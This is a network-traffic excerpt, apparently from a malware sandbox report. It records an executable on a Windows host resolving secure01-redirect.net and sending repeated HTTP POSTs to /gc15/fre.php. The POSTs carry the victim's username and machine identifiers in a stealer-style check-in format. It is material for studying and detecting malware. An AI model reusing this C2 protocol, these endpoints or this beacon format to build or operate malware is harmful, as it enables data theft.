                Jan 28, 2022 23:38:38.455079079 CET4985480192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:38.455202103 CET4985480192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:38.522505045 CET8049854185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:40.063682079 CET4985580192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:40.130693913 CET8049855185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:40.130824089 CET4985580192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:40.133790970 CET4985580192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:40.200942039 CET8049855185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:40.201057911 CET4985580192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:40.269145012 CET8049855185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:41.392921925 CET8049855185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:41.393049955 CET4985580192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:41.393270016 CET4985580192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:41.460256100 CET8049855185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:42.371988058 CET4986280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:42.441322088 CET8049862185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:42.441457987 CET4986280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:42.445022106 CET4986280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:42.514486074 CET8049862185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:42.514592886 CET4986280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:42.583889961 CET8049862185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:43.841937065 CET8049862185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:43.843163967 CET4986280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:43.843206882 CET4986280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:43.913798094 CET8049862185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:45.453150988 CET4987080192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:45.509287119 CET8049870185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:45.517376900 CET4987080192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:46.720808029 CET4987080192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:46.776935101 CET8049870185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:46.777277946 CET4987080192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:46.833422899 CET8049870185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:48.177226067 CET8049870185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:48.179321051 CET4987080192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:48.179387093 CET4987080192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:48.244923115 CET8049870185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:49.391843081 CET4988180192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:49.448906898 CET8049881185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:49.449040890 CET4988180192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:49.452650070 CET4988180192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:49.508794069 CET8049881185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:49.508902073 CET4988180192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:49.565010071 CET8049881185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:50.674108982 CET8049881185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:50.674257994 CET4988180192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:50.674331903 CET4988180192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:50.730500937 CET8049881185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:52.243490934 CET4988280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:52.310883045 CET8049882185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:52.312560081 CET4988280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:52.315956116 CET4988280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:52.383136988 CET8049882185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:52.383330107 CET4988280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:52.450537920 CET8049882185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:53.689454079 CET8049882185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:53.689598083 CET4988280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:53.689642906 CET4988280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:53.756779909 CET8049882185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:54.728399038 CET4988380192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:54.794935942 CET8049883185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:54.795932055 CET4988380192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:54.799525976 CET4988380192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:54.866142988 CET8049883185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:54.866242886 CET4988380192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:54.932748079 CET8049883185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:56.145380974 CET8049883185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:56.145605087 CET4988380192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:56.145793915 CET4988380192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:56.212276936 CET8049883185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:57.184376001 CET4988580192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:57.251727104 CET8049885185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:57.251866102 CET4988580192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:57.255335093 CET4988580192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:57.322743893 CET8049885185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:57.322833061 CET4988580192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:57.390343904 CET8049885185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:58.636996984 CET8049885185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:58.637293100 CET4988580192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:58.637939930 CET4988580192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:58.705543041 CET8049885185.185.69.76192.168.2.6
                Jan 28, 2022 23:39:00.067264080 CET4988680192.168.2.6185.185.69.76
                Jan 28, 2022 23:39:00.134578943 CET8049886185.185.69.76192.168.2.6
                Jan 28, 2022 23:39:00.134684086 CET4988680192.168.2.6185.185.69.76
                Jan 28, 2022 23:39:00.138022900 CET4988680192.168.2.6185.185.69.76
                Jan 28, 2022 23:39:00.206916094 CET8049886185.185.69.76192.168.2.6
                Jan 28, 2022 23:39:00.207024097 CET4988680192.168.2.6185.185.69.76
                Jan 28, 2022 23:39:00.276201010 CET8049886185.185.69.76192.168.2.6
                Jan 28, 2022 23:39:01.668778896 CET8049886185.185.69.76192.168.2.6
                Jan 28, 2022 23:39:01.668884039 CET4988680192.168.2.6185.185.69.76
                Jan 28, 2022 23:39:01.668965101 CET4988680192.168.2.6185.185.69.76
                Jan 28, 2022 23:39:01.736831903 CET8049886185.185.69.76192.168.2.6

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jan 28, 2022 23:37:06.902832985 CET6026153192.168.2.68.8.8.8
                Jan 28, 2022 23:37:07.189394951 CET53602618.8.8.8192.168.2.6
                Jan 28, 2022 23:37:09.895837069 CET5606153192.168.2.68.8.8.8
                Jan 28, 2022 23:37:10.210237026 CET53560618.8.8.8192.168.2.6
                Jan 28, 2022 23:37:14.289541960 CET5833653192.168.2.68.8.8.8
                Jan 28, 2022 23:37:14.308670044 CET53583368.8.8.8192.168.2.6
                Jan 28, 2022 23:37:17.111224890 CET5406453192.168.2.68.8.8.8
                Jan 28, 2022 23:37:17.397923946 CET53540648.8.8.8192.168.2.6
                Jan 28, 2022 23:37:19.890825033 CET5281153192.168.2.68.8.8.8
                Jan 28, 2022 23:37:20.199086905 CET53528118.8.8.8192.168.2.6
                Jan 28, 2022 23:37:22.728606939 CET5529953192.168.2.68.8.8.8
                Jan 28, 2022 23:37:22.747112989 CET53552998.8.8.8192.168.2.6
                Jan 28, 2022 23:37:25.315891027 CET6374553192.168.2.68.8.8.8
                Jan 28, 2022 23:37:25.332844019 CET53637458.8.8.8192.168.2.6
                Jan 28, 2022 23:37:29.174689054 CET6137453192.168.2.68.8.8.8
                Jan 28, 2022 23:37:29.193221092 CET53613748.8.8.8192.168.2.6
                Jan 28, 2022 23:37:33.873795986 CET5033953192.168.2.68.8.8.8
                Jan 28, 2022 23:37:33.890588045 CET53503398.8.8.8192.168.2.6
                Jan 28, 2022 23:37:36.492325068 CET4969453192.168.2.68.8.8.8
                Jan 28, 2022 23:37:36.512134075 CET53496948.8.8.8192.168.2.6
                Jan 28, 2022 23:37:39.327147961 CET5498253192.168.2.68.8.8.8
                Jan 28, 2022 23:37:39.343832970 CET53549828.8.8.8192.168.2.6
                Jan 28, 2022 23:37:41.614988089 CET5001053192.168.2.68.8.8.8
                Jan 28, 2022 23:37:41.901705027 CET53500108.8.8.8192.168.2.6
                Jan 28, 2022 23:37:44.693382025 CET6381653192.168.2.68.8.8.8
                Jan 28, 2022 23:37:44.712313890 CET53638168.8.8.8192.168.2.6
                Jan 28, 2022 23:37:50.316968918 CET5757453192.168.2.68.8.8.8
                Jan 28, 2022 23:37:50.335726976 CET53575748.8.8.8192.168.2.6
                Jan 28, 2022 23:37:54.998337984 CET5662853192.168.2.68.8.8.8
                Jan 28, 2022 23:37:55.016972065 CET53566288.8.8.8192.168.2.6
                Jan 28, 2022 23:37:59.082956076 CET5379953192.168.2.68.8.8.8
                Jan 28, 2022 23:37:59.388312101 CET53537998.8.8.8192.168.2.6
                Jan 28, 2022 23:38:02.078545094 CET6402153192.168.2.68.8.8.8
                Jan 28, 2022 23:38:02.097598076 CET53640218.8.8.8192.168.2.6
                Jan 28, 2022 23:38:06.313935041 CET5632753192.168.2.68.8.8.8
                Jan 28, 2022 23:38:06.332571983 CET53563278.8.8.8192.168.2.6
                Jan 28, 2022 23:38:09.962450027 CET6205553192.168.2.68.8.8.8
                Jan 28, 2022 23:38:09.979409933 CET53620558.8.8.8192.168.2.6
                Jan 28, 2022 23:38:12.312206030 CET6124953192.168.2.68.8.8.8
                Jan 28, 2022 23:38:12.639857054 CET53612498.8.8.8192.168.2.6
                Jan 28, 2022 23:38:16.923599005 CET6525253192.168.2.68.8.8.8
                Jan 28, 2022 23:38:17.208503962 CET53652528.8.8.8192.168.2.6
                Jan 28, 2022 23:38:20.080570936 CET6436753192.168.2.68.8.8.8
                Jan 28, 2022 23:38:20.099165916 CET53643678.8.8.8192.168.2.6
                Jan 28, 2022 23:38:23.150827885 CET6021153192.168.2.68.8.8.8
                Jan 28, 2022 23:38:23.169887066 CET53602118.8.8.8192.168.2.6
                Jan 28, 2022 23:38:27.394073009 CET5518053192.168.2.68.8.8.8
                Jan 28, 2022 23:38:27.411124945 CET53551808.8.8.8192.168.2.6
                Jan 28, 2022 23:38:30.973910093 CET5872153192.168.2.68.8.8.8
                Jan 28, 2022 23:38:30.992604017 CET53587218.8.8.8192.168.2.6
                Jan 28, 2022 23:38:33.417038918 CET5769153192.168.2.68.8.8.8
                Jan 28, 2022 23:38:33.435640097 CET53576918.8.8.8192.168.2.6
                Jan 28, 2022 23:38:37.043313980 CET5948953192.168.2.68.8.8.8
                Jan 28, 2022 23:38:37.061940908 CET53594898.8.8.8192.168.2.6
                Jan 28, 2022 23:38:40.043288946 CET6402253192.168.2.68.8.8.8
                Jan 28, 2022 23:38:40.062098980 CET53640228.8.8.8192.168.2.6
                Jan 28, 2022 23:38:42.351895094 CET5719353192.168.2.68.8.8.8
                Jan 28, 2022 23:38:42.370554924 CET53571938.8.8.8192.168.2.6
                Jan 28, 2022 23:38:45.427057981 CET5024853192.168.2.68.8.8.8
                Jan 28, 2022 23:38:45.444062948 CET53502488.8.8.8192.168.2.6
                Jan 28, 2022 23:38:49.258750916 CET6042953192.168.2.68.8.8.8
                Jan 28, 2022 23:38:49.277318954 CET53604298.8.8.8192.168.2.6
                Jan 28, 2022 23:38:52.224076986 CET6034553192.168.2.68.8.8.8
                Jan 28, 2022 23:38:52.241295099 CET53603458.8.8.8192.168.2.6
                Jan 28, 2022 23:38:54.707078934 CET5873053192.168.2.68.8.8.8
                Jan 28, 2022 23:38:54.726234913 CET53587308.8.8.8192.168.2.6
                Jan 28, 2022 23:38:57.165729046 CET5722653192.168.2.68.8.8.8
                Jan 28, 2022 23:38:57.182893038 CET53572268.8.8.8192.168.2.6
                Jan 28, 2022 23:38:59.576981068 CET5788053192.168.2.68.8.8.8
                Jan 28, 2022 23:38:59.887764931 CET53578808.8.8.8192.168.2.6

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Jan 28, 2022 23:37:06.902832985 CET192.168.2.68.8.8.80x1758Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:37:09.895837069 CET192.168.2.68.8.8.80x8e74Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:37:14.289541960 CET192.168.2.68.8.8.80xce34Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:37:17.111224890 CET192.168.2.68.8.8.80xc12fStandard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:37:19.890825033 CET192.168.2.68.8.8.80x6ed9Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:37:22.728606939 CET192.168.2.68.8.8.80x7b58Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:37:25.315891027 CET192.168.2.68.8.8.80xb9e4Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:37:29.174689054 CET192.168.2.68.8.8.80xb594Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:37:33.873795986 CET192.168.2.68.8.8.80x13c8Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:37:36.492325068 CET192.168.2.68.8.8.80x439fStandard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:37:39.327147961 CET192.168.2.68.8.8.80x8600Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:37:41.614988089 CET192.168.2.68.8.8.80x5beeStandard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:37:44.693382025 CET192.168.2.68.8.8.80xf87fStandard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:37:50.316968918 CET192.168.2.68.8.8.80x112bStandard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:37:54.998337984 CET192.168.2.68.8.8.80xf5d8Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:37:59.082956076 CET192.168.2.68.8.8.80x4e06Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:38:02.078545094 CET192.168.2.68.8.8.80x7c80Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:38:06.313935041 CET192.168.2.68.8.8.80x35e8Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:38:09.962450027 CET192.168.2.68.8.8.80x557bStandard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:38:12.312206030 CET192.168.2.68.8.8.80xb6caStandard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:38:16.923599005 CET192.168.2.68.8.8.80x4b7bStandard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:38:20.080570936 CET192.168.2.68.8.8.80x749fStandard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:38:23.150827885 CET192.168.2.68.8.8.80x5a17Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:38:27.394073009 CET192.168.2.68.8.8.80x6f6cStandard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:38:30.973910093 CET192.168.2.68.8.8.80x3c33Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:38:33.417038918 CET192.168.2.68.8.8.80xd1b4Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:38:37.043313980 CET192.168.2.68.8.8.80xd0d3Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:38:40.043288946 CET192.168.2.68.8.8.80x1c64Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:38:42.351895094 CET192.168.2.68.8.8.80x4aa3Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:38:45.427057981 CET192.168.2.68.8.8.80x6552Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:38:49.258750916 CET192.168.2.68.8.8.80xae82Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:38:52.224076986 CET192.168.2.68.8.8.80xdd80Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:38:54.707078934 CET192.168.2.68.8.8.80xfd3dStandard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:38:57.165729046 CET192.168.2.68.8.8.80xab3cStandard query (0)secure01-redirect.netA (IP address)IN (0x0001)
                Jan 28, 2022 23:38:59.576981068 CET192.168.2.68.8.8.80x719aStandard query (0)secure01-redirect.netA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Jan 28, 2022 23:37:07.189394951 CET8.8.8.8192.168.2.60x1758No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:37:10.210237026 CET8.8.8.8192.168.2.60x8e74No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:37:14.308670044 CET8.8.8.8192.168.2.60xce34No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:37:17.397923946 CET8.8.8.8192.168.2.60xc12fNo error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:37:20.199086905 CET8.8.8.8192.168.2.60x6ed9No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:37:22.747112989 CET8.8.8.8192.168.2.60x7b58No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:37:25.332844019 CET8.8.8.8192.168.2.60xb9e4No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:37:29.193221092 CET8.8.8.8192.168.2.60xb594No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:37:33.890588045 CET8.8.8.8192.168.2.60x13c8No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:37:36.512134075 CET8.8.8.8192.168.2.60x439fNo error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:37:39.343832970 CET8.8.8.8192.168.2.60x8600No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:37:41.901705027 CET8.8.8.8192.168.2.60x5beeNo error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:37:44.712313890 CET8.8.8.8192.168.2.60xf87fNo error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:37:50.335726976 CET8.8.8.8192.168.2.60x112bNo error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:37:55.016972065 CET8.8.8.8192.168.2.60xf5d8No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:37:59.388312101 CET8.8.8.8192.168.2.60x4e06No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:38:02.097598076 CET8.8.8.8192.168.2.60x7c80No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:38:06.332571983 CET8.8.8.8192.168.2.60x35e8No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:38:09.979409933 CET8.8.8.8192.168.2.60x557bNo error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:38:12.639857054 CET8.8.8.8192.168.2.60xb6caNo error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:38:17.208503962 CET8.8.8.8192.168.2.60x4b7bNo error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:38:20.099165916 CET8.8.8.8192.168.2.60x749fNo error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:38:23.169887066 CET8.8.8.8192.168.2.60x5a17No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:38:27.411124945 CET8.8.8.8192.168.2.60x6f6cNo error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:38:30.992604017 CET8.8.8.8192.168.2.60x3c33No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:38:33.435640097 CET8.8.8.8192.168.2.60xd1b4No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:38:37.061940908 CET8.8.8.8192.168.2.60xd0d3No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:38:40.062098980 CET8.8.8.8192.168.2.60x1c64No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:38:42.370554924 CET8.8.8.8192.168.2.60x4aa3No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:38:45.444062948 CET8.8.8.8192.168.2.60x6552No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:38:49.277318954 CET8.8.8.8192.168.2.60xae82No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:38:52.241295099 CET8.8.8.8192.168.2.60xdd80No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:38:54.726234913 CET8.8.8.8192.168.2.60xfd3dNo error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:38:57.182893038 CET8.8.8.8192.168.2.60xab3cNo error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
                Jan 28, 2022 23:38:59.887764931 CET8.8.8.8192.168.2.60x719aNo error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)

                HTTP Request Dependency Graph

                • secure01-redirect.net

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.649769185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:37:07.260369062 CET1240OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 196
                Connection: close
                Jan 28, 2022 23:37:07.318934917 CET1240OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: 'ckav.ruengineer258555DESKTOP-716T771k08F9C4E9C79A3B52B3F739430dviSD
                Jan 28, 2022 23:37:08.647847891 CET1240INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:38:49 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 15
                Content-Type: text/html; charset=UTF-8
                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                1192.168.2.649770185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:37:10.277966022 CET1241OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 196
                Connection: close
                Jan 28, 2022 23:37:10.334817886 CET1241OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: 'ckav.ruengineer258555DESKTOP-716T771+08F9C4E9C79A3B52B3F7394302mSUK
                Jan 28, 2022 23:37:12.345729113 CET1242INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:38:52 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 15
                Content-Type: text/html; charset=UTF-8
                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                10192.168.2.649783185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:37:39.408766985 CET1383OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:37:39.466222048 CET1383OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:37:40.689152956 CET1384INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:21 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                11192.168.2.649784185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:37:41.973819971 CET1384OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:37:42.042471886 CET1385OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:37:43.403239012 CET1385INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:23 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                12192.168.2.649787185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:37:44.786353111 CET1397OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
